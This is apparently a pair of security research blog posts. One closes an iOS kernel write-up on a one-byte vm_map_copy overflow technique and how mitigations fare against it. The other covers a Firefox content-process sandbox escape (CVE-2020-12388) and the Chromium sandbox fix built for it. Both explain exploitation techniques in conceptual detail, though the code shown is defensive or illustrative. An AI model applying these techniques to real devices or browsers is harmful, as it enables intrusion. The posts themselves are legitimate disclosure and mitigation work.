At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that c_u.hdr.links.next overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the c_u.hdr.links.next fields.

After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.

Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.

The mitigating of the Shire

So, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?

The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.

First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that we need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once we have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons. First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.

The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.

Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.

PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.

Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.

However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.

The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.

In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.

Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.

In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.

However, if the use of zone_require were expanded, it is possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow.
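For illustration, a sketch of what that single check might look like inside vm_map_copyout_internal(); the zone_require() signature is assumed from its other call sites:

/* In vm_map_copyout_internal(), before walking the entry list: */
if (copy->type == VM_MAP_COPY_ENTRY_LIST) {
    /* A KERNEL_BUFFER copy is allocated with kalloc(), not from
     * vm_map_copy_zone, so a corrupted type field would panic here. */
    zone_require(copy, vm_map_copy_zone);
}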

"Appendix A": Annals of the exploits

In my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.

Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".

That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.

All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.

Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)

"Appendix B": Conclusions

I'll conclude by returning to the three questions posed at the very beginning of this post:

Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.

To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and I expect there are other as-yet unpublished techniques that are equally good.

To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.

Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.

Indices

One final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:

An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.

I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.

FF Sandbox Escape (CVE-2020-12388)

Published: 2020-06-17 15:58:00

Popularity: 301

Author: Unknown

By James Forshaw, Project Zero


In my previous blog post I discussed an issue with the Windows Kernel’s handling of Restricted Tokens which allowed me to escape the Chrome GPU sandbox. Originally I’d planned to use Firefox for the proof-of-concept as Firefox uses the same effective sandbox level as the Chrome GPU process for its content renderers. That means a FF content RCE would give code execution in a sandbox where you could abuse the Windows Kernel Restricted Tokens issue, making it much more serious.

However, while researching the sandbox escape I realized that was the least of FF’s worries.  The use of the GPU level sandbox for multiple processes introduced a sandbox escape vector, even once the Windows issue was fixed. This blog post is about the specific behavior of the Chromium sandbox and why FF was vulnerable. I’ll also detail the changes I made to the Chromium sandbox to introduce a way of mitigating the issue which was used by Mozilla to fix my report.

For reference, the P0 issue is 2016 and the FF issue is 1618911. FF defines its own sandboxing profiles, documented on this page. The content sandbox at the time of writing is defined as Level 5, so I'll refer to L5 going forward rather than a GPU sandbox.

Root Cause

The root cause of the issue is that with L5, one content process can open another for full access. In Chromium derived browsers this isn't usually an issue: only one GPU process is running at a time, although there could be other non-Chromium processes running at the same time which might be accessible. The sandbox used by content renderers in Chromium is significantly more limited, and they should not be able to open any other processes.

The L5 sandbox uses a Restricted Token as the primary sandbox enforcement. The reason one content process can access another is down to the Default DACL of the Primary Token of the process. For a content process the Default DACL which is set in RestrictedToken::GetRestrictedToken grants full access to the following users:

User                       Access
Current User               Full Access
NT AUTHORITY\SYSTEM        Full Access
NT AUTHORITY\RESTRICTED    Full Access
Logon SID                  Read and Execute Access

The Default DACL is used to set the initial Process and Thread Security Descriptors. The Token level used by L5 is USER_LIMITED which disables almost all groups except for:
  • Current User
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\INTERACTIVE
  • Logon SID

And adds the following restricted SIDs:
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\RESTRICTED
  • Logon SID

Tying all this together, the combination of the Current User group and the RESTRICTED restricted SID results in granting full access to the sandbox Process or Thread.
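To see why both matter, recall that a Restricted Token must pass the DACL check twice: once with its normal enabled groups and once with its restricted SIDs. A toy model of the L5 case (not real Windows code; access masks elided):

#include <stdbool.h>
#include <string.h>

/* The L5 Default DACL from the table above (access masks elided). */
static bool dacl_grants(const char *sid) {
    return strcmp(sid, "CurrentUser") == 0 || strcmp(sid, "SYSTEM") == 0 ||
           strcmp(sid, "RESTRICTED") == 0  || strcmp(sid, "LogonSID") == 0;
}

bool l5_can_open_l5(void) {
    bool normal_pass = dacl_grants("CurrentUser");    /* enabled group check */
    bool restricted_pass = dacl_grants("RESTRICTED"); /* restricted SID check */
    return normal_pass && restricted_pass;            /* both pass: full access */
}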

To understand why being able to open another content process was such a problem, we have to understand how the Chromium sandbox bootstraps a new process. Due to the way Primary Tokens are assigned to a new process, once the process starts its Token can no longer be exchanged for a different one. You can do a few things, such as deleting privileges and dropping the Integrity Level, but removing groups or adding new restricted SIDs isn't possible.

A new sandboxed process needs to do some initial warmup which might require more access than is granted to the restricted sandbox Token, so Chromium uses a trick. It assigns a more privileged Impersonation Token to the initial thread, so that the warmup runs with higher privileges. For L5 the level for the initial Token is USER_RESTRICTED_SAME_ACCESS, which just creates a Restricted Token with no disabled groups and all the normal groups added as restricted SIDs. This makes the Token almost equivalent to a normal Token, but it is still considered Restricted: Windows would block setting the Impersonation Token if the Primary Token is Restricted but the Impersonation Token is not.

The Impersonation Token is dropped once all warmup has completed by calling the LowerToken function in the sandbox target services. What this means is that there's a time window, from when a new sandboxed process starts to when LowerToken is called, during which the process is effectively running unsandboxed except for having a Low IL. If you could hijack execution before the impersonation is dropped you could immediately gain privileges sufficient to escape the sandbox.


Unlike the Chrome GPU process, FF spawns new content processes regularly during normal use. Just creating a new tab can spawn a new process. Therefore one compromised content process only has to wait until a new process is created and then immediately hijack it. A compromised renderer can almost certainly force a new process to be created through an IPC call, but I didn't investigate that further.

With this knowledge I developed a full POC using many of the same techniques as in the previous blog post. The higher privileges of the USER_RESTRICTED_SAME_ACCESS Token simplify the exploit. For example, we no longer need to hijack the COM Server's thread, as the more privileged Token allows us to directly open the process. Also, crucially, we never need to leave the Restricted Sandbox, so the exploit doesn't rely on the kernel bug MS fixed for the previous issue. You can find the full POC attached to the issue, and I've summarised the steps in the following diagram.


Developing a Fix

In my report I suggested a fix for the issue: enabling the SetLockdownDefaultDacl option in the sandbox policy. SetLockdownDefaultDacl removes both the RESTRICTED and Logon SIDs from the Default DACL, which would prevent one L5 process opening another. I had added this sandbox policy function in response to the GPU sandbox escape I mentioned in the previous blog, which was used by lokihardt at Pwn2Own. However, the intention was to block the GPU process opening a renderer process, not to prevent one GPU process from opening another. Therefore the policy was set only on renderers, not on the GPU sandbox.

It turns out that I wasn't the first person to report the ability of one FF content process to open another. Niklas Baumstark had reported it a year prior to my report. The fix I had suggested, enabling SetLockdownDefaultDacl, had been tried in fixing Niklas' report, but it broke various things including the DirectWrite cache and Audio Playback, and caused significant performance regressions, which made applying SetLockdownDefaultDacl undesirable. The reason things such as the DirectWrite cache break is a typical coding pattern in Windows RPC services, as shown below:

#include <windows.h>
#include <rpc.h>

int RpcCall(handle_t handle, LPCWSTR some_value) {
  DWORD pid;
  I_RpcBindingInqLocalClientPID(handle, &pid);

  // Impersonate the caller and try to open a handle to its process.
  RpcImpersonateClient(handle);
  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
  if (!process)
    return ERROR_ACCESS_DENIED;

  ...
}

This example code is running in a privileged service and is called over RPC by the sandboxed application. It first calls the RPC runtime to query the caller’s Process ID. Then it impersonates the caller and tries to open a handle to the calling process. If opening the process fails then the RPC call returns an access denied error.

For normal applications it’s a perfectly reasonable assumption that the caller can access its own process. However, once we lockdown the process security this is no longer the case. If we’re blocking access to other processes at the same level then as a consequence we also block opening our own process. Normally this isn’t an issue as most code inside the process uses the Current Process Pseudo handle which never goes through an access check.

Niklas' report didn't come with a full sandbox escape. The lack of a full POC, plus the difficulty in fixing the issue, resulted in the fix stalling. However, with a full sandbox escape demonstrating the impact, Mozilla would have to choose between performance and security unless another fix could be implemented. As I'm a Chromium committer as well as an owner of the Windows sandbox, I realized I might be better placed to fix this than Mozilla, who relied on our code.

The fix must do two things:
  • Grant the process access to its own process and threads.
  • Deny any other process at the same level.

Without administrator privileges, many angles, such as Kernel Process Callbacks, are not available to us. The fix must be entirely in user mode with normal user privileges.

The key to the fix is that the list of restricted SIDs can include SIDs which are not present in the Token's existing groups. We can generate a random SID per sandbox process and add it both as a restricted SID and to the Default DACL. We can then use SetLockdownDefaultDacl to lock down the rest of the Default DACL.

When a process opens its own process or threads, the access check will match on the Current User SID for the normal check and on the Random SID for the restricted SID check. This also works over RPC. However, each content process has a different Random SID, so when one content process tries to open another, the normal check still passes but the restricted SID check cannot. This achieves both of our goals. You can check the implementation in PolicyBase::MakeTokens.
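A condensed sketch of that approach follows; see PolicyBase::MakeTokens in Chromium for the real implementation. The SID authority used for the random SID, the helper name, and the elided error handling and DACL construction are all assumptions for illustration:

#include <windows.h>
#include <bcrypt.h>   /* link against bcrypt.lib */

BOOL MakeLockedDownToken(HANDLE base_token, HANDLE *new_token, PSID *random_sid) {
  /* 1. Generate a random per-process SID (authority choice is illustrative). */
  SID_IDENTIFIER_AUTHORITY authority = { { 0, 0, 0, 0, 0, 9 } };
  DWORD sub[4];
  BCryptGenRandom(NULL, (PUCHAR)sub, sizeof(sub),
                  BCRYPT_USE_SYSTEM_PREFERRED_RNG);
  AllocateAndInitializeSid(&authority, 4, sub[0], sub[1], sub[2], sub[3],
                           0, 0, 0, 0, random_sid);

  /* 2. Add it to the restricted SID list (the usual Users/Everyone/
   * RESTRICTED/Logon SIDs are elided here). */
  SID_AND_ATTRIBUTES restricted[1] = { { *random_sid, 0 } };
  if (!CreateRestrictedToken(base_token, 0, 0, NULL, 0, NULL,
                             1, restricted, new_token))
    return FALSE;

  /* 3. Lock down the Default DACL: grant access only to the current user,
   * SYSTEM, and this random SID, so only this process (which holds the SID
   * as a restricted SID) passes both halves of the access check. DACL
   * construction elided: InitializeAcl + AddAccessAllowedAce(...,
   * GENERIC_ALL, *random_sid) + SetTokenInformation(*new_token,
   * TokenDefaultDacl, ...). */
  return TRUE;
}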

I added the patch to the Chromium repository and FF was able to merge and test it. It blocked the attack vector and seemingly did not reintroduce the previous performance issues. I say "seemingly" because part of the problem with any change like this is that it's impossible to know for certain that no RPC service or other code relies on a specific behavior that the change breaks. However, this code is now shipping in FF76, so no doubt it'll become apparent if there are issues.

Another problem with the fix is that it's opt-in: to be secure, every other process on the system has to opt in to the mitigation, including all Chromium browsers as well as users of Chromium such as Electron. For example, if Chrome isn't updated then a FF content process could kill Chrome's GPU process, causing Chrome to restart it, at which point the FF process could escape via Chrome by hijacking the new GPU process. This is why, even though it is not directly vulnerable, I enabled the mitigation on the Chromium GPU process, which has shipped in M83 (and Microsoft Edge 83) released at the end of April 2020.

In conclusion, this blog post demonstrated a sandbox escape in FF which required adding a new feature to the Chromium sandbox. In contrast to the previous blog post, it was possible to remediate the issue without requiring a change to Windows code that FF and Chromium don't have access to. That said, it's likely we were lucky that the change was possible without breaking anything important. Next time it might not be so easy.
